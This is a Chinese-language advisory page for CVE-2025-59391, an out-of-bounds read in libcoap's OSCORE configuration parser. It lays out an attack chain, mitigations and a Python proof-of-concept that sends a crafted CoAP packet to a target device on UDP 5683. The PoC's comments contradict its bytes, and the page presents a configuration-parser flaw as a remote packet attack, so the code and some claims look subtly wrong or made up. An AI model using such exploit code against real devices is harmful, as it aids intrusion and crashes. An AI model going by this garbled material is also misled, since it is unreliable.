CVE-2025-59391 libcoap OSCORE配置解析器内存越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-59391

漏洞类型

内存越界读取

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

libcoap

漏洞概述

CVE-2025-59391是libcoap库中OSCORE（Object Security for Constrained RESTful Environments）配置解析器存在的一个内存泄露漏洞。该漏洞影响libcoap在release-4.3.5-patches之前的所有版本。攻击者可以通过构造特制的OSCORE配置文件来触发解析器中的越界读取操作，从而可能读取.rodata段中字符串边界之外的内存内容。这种信息泄露可能导致敏感数据暴露，如内存地址、配置密钥或其他机密信息。虽然CVSS评分6.5属于中等严重程度，但该漏洞无需认证即可远程利用，且可能与其他漏洞结合造成更严重的影响。在资源受限的物联网设备中，此类内存泄露可能导致应用程序崩溃，从而引发拒绝服务攻击。

技术细节

漏洞根源在于libcoap的OSCORE配置解析函数在处理特定配置值时缺乏适当的边界检查。当解析器读取配置字符串时，如果配置值长度超过预期缓冲区大小，可能触发out-of-bounds读取。具体来说，解析器在处理OSCORE配置参数（如sender_id、recipient_id等）时，使用了不安全的字符串复制操作，未验证源字符串长度是否在目标缓冲区容纳范围内。攻击者可通过提供超长字符串或包含特殊字符的配置值，使解析器读取超出.rodata段的内存内容。成功的越界读取可能泄露堆栈/堆元数据、函数指针或其他敏感内存信息，为进一步攻击提供基础。修复版本v4.3.5a通过增加长度验证和安全的内存操作解决了此问题。

攻击链分析

STEP 1

步骤1

攻击者识别目标设备上运行的libcoap版本，确认其低于v4.3.5a

STEP 2

步骤2

攻击者构造包含超长sender_id或recipient_id字段的恶意OSCORE配置

STEP 3

步骤3

通过CoAP协议将特制数据包发送到目标设备的5683/udp端口

STEP 4

步骤4

libcoap的OSCORE解析器处理畸形配置时发生越界读取

STEP 5

步骤5

攻击者接收响应并分析泄露的内存信息，可能包含密钥片段、内存地址等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59391 PoC - libcoap OSCORE Configuration Parser OOB Read
# This PoC demonstrates triggering an out-of-bounds read in libcoap's OSCORE parser

import struct
import socket

def create_malicious_config():
    """Generate malicious OSCORE configuration to trigger OOB read"""
    # Craft an OSCORE configuration with oversized ID fields
    config = bytearray()
    
    # OSCORE option header
    config += bytes([0xAB])  # Option number for OSCORE
    
    # Malformed OSCORE payload with oversized sender_id
    # sender_id length exceeds expected buffer size
    oversized_id = b'A' * 512  # 512 bytes when parser expects much less
    
    # Construct payload that triggers the vulnerable parsing path
    payload = bytearray()
    payload += bytes([0x01])  # OSCORE flag byte
    payload += struct.pack('>H', len(oversized_id))  # Length prefix
    payload += oversized_id
    payload += bytes([0x02, 0x03])  # Additional malformed fields
    
    config += bytes([len(payload)])  # Option length
    config += payload
    
    return bytes(config)

def send_exploit(target_host, target_port=5683):
    """Send malicious CoAP packet with OSCORE configuration"""
    pkt = bytearray()
    
    # CoAP Header
    pkt += bytes([0x40, 0x03])  # Version 1, CON, POST
    pkt += bytes([0x00, 0x01])  # Message ID
    pkt += bytes([0x00])  # Token length = 0
    
    # URI-Path option (required for OSCORE request)
    pkt += bytes([0x03, 0x01, 0x2E])  # OSCORE option
    pkt += create_malicious_config()
    
    # Payload marker
    pkt += bytes([0xFF])
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    try:
        sock.sendto(pkt, (target_host, target_port))
        response, addr = sock.recvfrom(4096)
        return response
    except socket.timeout:
        return None
    finally:
        sock.close()

if __name__ == "__main__":
    target = "192.168.1.100"
    result = send_exploit(target)
    print(f"[*] Sent malicious OSCORE config to {target}")
    if result:
        print(f"[*] Response received: {result.hex()}")
        print("[*] Potential OOB read triggered - analyze response for leaked memory")
    else:
        print("[*] No response - target may have crashed or is filtering")

影响范围

libcoap < release-4.3.5-patches

libcoap < v4.3.5a

防御指南

临时缓解措施

如果无法立即升级，可通过禁用OSCORE功能或限制CoAP服务仅接受可信来源的连接来缓解风险。同时在防火墙层面限制对UDP 5683端口的访问，仅允许已知可信IP地址通信。建议在应用层实现额外的配置验证逻辑，过滤超长字符串和异常格式的OSCORE参数。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59391
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59391
3 Details https://www.cvedetails.com/cve/CVE-2025-59391/
4 VulDB https://vuldb.com/cve/CVE-2025-59391
5 Link https://github.com/obgm/libcoap/pull/1730
6 Link https://github.com/obgm/libcoap/releases/tag/v4.3.5a